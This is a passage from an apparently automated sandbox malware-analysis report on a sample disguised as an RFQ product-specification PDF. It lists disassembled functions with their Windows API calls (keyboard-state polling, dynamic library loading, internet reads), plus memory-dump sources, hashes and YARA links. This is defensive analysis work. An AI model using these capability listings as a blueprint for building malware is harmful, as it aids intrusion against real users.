                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4136290138-0
                                                                                                                • Opcode ID: 23653f317303da328531d37d16b42329e9280509d200735b29066468b6120ba2
                                                                                                                • Instruction ID: 6002955bd65fd3b4304da20635c5307132aaa4bf27978775e45aff06c6a13f72
                                                                                                                • Opcode Fuzzy Hash: 23653f317303da328531d37d16b42329e9280509d200735b29066468b6120ba2
                                                                                                                • Instruction Fuzzy Hash: E1516CB5A00219EFCB14CF68C894AAAB7F8FF89310B158559F906DB390E734E911CF90
                                                                                                                Function 00AB8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AB8BAE
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00AB8BDA
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AB8C32
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AB8C57
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AB8C5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                • String ID:
                                                                                                                • API String ID: 2832842796-0
                                                                                                                • Opcode ID: b8f9fbb83aac3924eb8db562d032118d261d3d4fb36cbf5f9ff0024d2acf7407
                                                                                                                • Instruction ID: 96efbfd0b21e673bc1059917fef7dc612fd2cb6b6e57d4435cef39f77c74d836
                                                                                                                • Opcode Fuzzy Hash: b8f9fbb83aac3924eb8db562d032118d261d3d4fb36cbf5f9ff0024d2acf7407
                                                                                                                • Instruction Fuzzy Hash: 47515D79A002159FCB00DF64C981EADBBF5FF49314F088459E84AAB362CB35ED51CB91
                                                                                                                Function 00AC8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AC8F40
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AC8FD0
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AC8FEC
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AC9032
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00AC9052
                                                                                                                  • Part of subcall function 00A5F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00AB1043,?,7644E610), ref: 00A5F6E6
                                                                                                                  • Part of subcall function 00A5F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A9FA64,00000000,00000000,?,?,00AB1043,?,7644E610,?,00A9FA64), ref: 00A5F70D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 666041331-0
                                                                                                                • Opcode ID: 28ccc82e47a4feb459243a0c393895979e3bf7d01655dd909911a2496cd1396f
                                                                                                                • Instruction ID: 51427a79ec85b64ae16addb6a5bf7f3c452d91bbb73017d3410d70fda270058e
                                                                                                                • Opcode Fuzzy Hash: 28ccc82e47a4feb459243a0c393895979e3bf7d01655dd909911a2496cd1396f
                                                                                                                • Instruction Fuzzy Hash: 18512939601205DFCB11DF58C584DAEBBF1FF49324B0581A9E80A9B762DB31ED86CB91
                                                                                                                Function 00AD6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AD6C33
                                                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00AD6C4A
                                                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AD6C73
                                                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00ABAB79,00000000,00000000), ref: 00AD6C98
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AD6CC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MessageSendShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3688381893-0
                                                                                                                • Opcode ID: 735541614deecf1d24f812b8ef917997c65e3d8d084243cddc9f875a2787248b
                                                                                                                • Instruction ID: bdade692834cfb3bb401dcdd1f6fd383f101e72d3c05c16ee0a8ae2486db1e5f
                                                                                                                • Opcode Fuzzy Hash: 735541614deecf1d24f812b8ef917997c65e3d8d084243cddc9f875a2787248b
                                                                                                                • Instruction Fuzzy Hash: 7341D335A14104AFDB24CF68CD58FA97BB5EB09360F15026AF996A73E0C771ED41DA40
                                                                                                                Function 00A72051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID:
                                                                                                                • API String ID: 269201875-0
                                                                                                                • Opcode ID: e2df7a18c1ad4d8564271866db3afb865f9a72bc8acfbf23a7486ef7491e95cd
                                                                                                                • Instruction ID: f690b87933812b979b3324d4f9e5d31e26488fef7d105d8b68605e86939c51ee
                                                                                                                • Opcode Fuzzy Hash: e2df7a18c1ad4d8564271866db3afb865f9a72bc8acfbf23a7486ef7491e95cd
                                                                                                                • Instruction Fuzzy Hash: 7C419032A002009FCB24DF78CD81B59B7B5EF89314F55C569EA19EB351DB31AD01CB91
                                                                                                                Function 00A5912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00A59141
                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00A5915E
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00A59183
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 00A5919D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: 2697d4bf66c1257119a1077030615d21f08bbdfed1ba71ee3550b5ae26ad7baf
                                                                                                                • Instruction ID: f93dc06aaec1cba7d45a2521105587dc6701ecc931e79e707b27129d3ad781ef
                                                                                                                • Opcode Fuzzy Hash: 2697d4bf66c1257119a1077030615d21f08bbdfed1ba71ee3550b5ae26ad7baf
                                                                                                                • Instruction Fuzzy Hash: 21413F71A0861BFBDF159F64C844BEEB7B5FB05325F208316E829A72A0C7346D54CBA1
                                                                                                                Function 00AB3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetInputState.USER32 ref: 00AB38CB
                                                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00AB3922
                                                                                                                • TranslateMessage.USER32(?), ref: 00AB394B
                                                                                                                • DispatchMessageW.USER32(?), ref: 00AB3955
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB3966
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2256411358-0
                                                                                                                • Opcode ID: 83ff8b5139878bfb7968ace067802e6d3dae27fefa3f80c7e37fd3fb9c8974c9
                                                                                                                • Instruction ID: 57ced998c47cad78c9f748d3396a035e279e9d7b00a6cfb2337eccecd37aeef1
                                                                                                                • Opcode Fuzzy Hash: 83ff8b5139878bfb7968ace067802e6d3dae27fefa3f80c7e37fd3fb9c8974c9
                                                                                                                • Instruction Fuzzy Hash: 8A31D972504342EEEF35CB789858BF63BACAB05300F44456DD562C31A2EBF49685CB11
                                                                                                                Function 00ABCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCF38
                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00ABCF6F
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCFB4
                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCFC8
                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCFF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3191363074-0
                                                                                                                • Opcode ID: e72b7a6e46efb4d0f9a3d46417899032d155a257559a102ba9449f6c0d0caa8e
                                                                                                                • Instruction ID: 3278724da843fcfaf21662cf350fd4040361507a6e9295ef702b3046c89e7d0e
                                                                                                                • Opcode Fuzzy Hash: e72b7a6e46efb4d0f9a3d46417899032d155a257559a102ba9449f6c0d0caa8e
                                                                                                                • Instruction Fuzzy Hash: 0E313871A00306AFDB20DFA5C984EBABBFDEB14365B1044AEF506D2142DB30AE41DB60
                                                                                                                Function 00AA1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA1915
                                                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 00AA19C1
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 00AA19C9
                                                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 00AA19DA
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00AA19E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: bb20c21de79c7dc337932cfa97e4a3a0abe072f37a585cf19c4b295076e0eb9d
                                                                                                                • Instruction ID: 635c041711142e7b00aadc75e9ca3e108cf20929d9a2a8252ddc8a5c475d8cce
                                                                                                                • Opcode Fuzzy Hash: bb20c21de79c7dc337932cfa97e4a3a0abe072f37a585cf19c4b295076e0eb9d
                                                                                                                • Instruction Fuzzy Hash: 2731A071A00219FFCB04CFA8CD99AEF7BB5EB45325F104229F922AB2D1C7709955DB90
                                                                                                                Function 00AD5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AD5745
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AD579D
                                                                                                                • _wcslen.LIBCMT ref: 00AD57AF
                                                                                                                • _wcslen.LIBCMT ref: 00AD57BA
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD5816
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 763830540-0
                                                                                                                • Opcode ID: 5b9a29b902366b556e734aa5a3da21a51c1f9bd6466aa59f373e01d40e2436bb
                                                                                                                • Instruction ID: 0a94871301e0976f3d5a327b656f215953ecb7c17f6cc1fe416447277dd0d6b3
                                                                                                                • Opcode Fuzzy Hash: 5b9a29b902366b556e734aa5a3da21a51c1f9bd6466aa59f373e01d40e2436bb
                                                                                                                • Instruction Fuzzy Hash: 47217E71D046189ADB209FB4CC85AEE7BB8FF04724F108617E92AEA2C0D7748A85CF51
                                                                                                                Function 00AC0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00AC0951
                                                                                                                • GetForegroundWindow.USER32 ref: 00AC0968
                                                                                                                • GetDC.USER32(00000000), ref: 00AC09A4
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00AC09B0
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00AC09E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 7837020234a646207b1940c6f5aa4304768fbb45ff2117368ae11ddfd65df3ac
                                                                                                                • Instruction ID: 30a3dd7bcc194a3e7ba4edf0af96056a1affa8942aa3486721a073fd9144432e
                                                                                                                • Opcode Fuzzy Hash: 7837020234a646207b1940c6f5aa4304768fbb45ff2117368ae11ddfd65df3ac
                                                                                                                • Instruction Fuzzy Hash: D0216D39600214AFD704EFA5C984EAEBBF9EF48710F04806DE85A97362CB70EC05CB50
                                                                                                                Function 00A7CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00A7CDC6
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A7CDE9
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A7CE0F
                                                                                                                • _free.LIBCMT ref: 00A7CE22
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A7CE31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 336800556-0
                                                                                                                • Opcode ID: fd5f0bb526da90b7f5470896ef064904e37ea681bfda9bd7deca0b96b7ed83bc
                                                                                                                • Instruction ID: 083b7cc144ac09ed78e29cbc5d2ad6889d552ae77807246dd9534fd9e467ad90
                                                                                                                • Opcode Fuzzy Hash: fd5f0bb526da90b7f5470896ef064904e37ea681bfda9bd7deca0b96b7ed83bc
                                                                                                                • Instruction Fuzzy Hash: 5C01D8726026157FA72157B66C48D7B7A6DDFC6BB1315C12EF909C7101EA608D0281B4
                                                                                                                Function 00A59639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A59693
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00A596A2
                                                                                                                • BeginPath.GDI32(?), ref: 00A596B9
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00A596E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: b829c71c03b2c6bd6e25dd712a79aa78d18edb0e8433b00994194a1e7d03dcc6
                                                                                                                • Instruction ID: f556c0c50e5e4eabe53b16a9b3a58d4c96ec5b127c885b52e8e51f7f69525844
                                                                                                                • Opcode Fuzzy Hash: b829c71c03b2c6bd6e25dd712a79aa78d18edb0e8433b00994194a1e7d03dcc6
                                                                                                                • Instruction Fuzzy Hash: 59218330802306EBDB11DF68DC157EA7BB5BB103A6F908616F9219B1B1D774585ACFA0
                                                                                                                Function 00AA5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
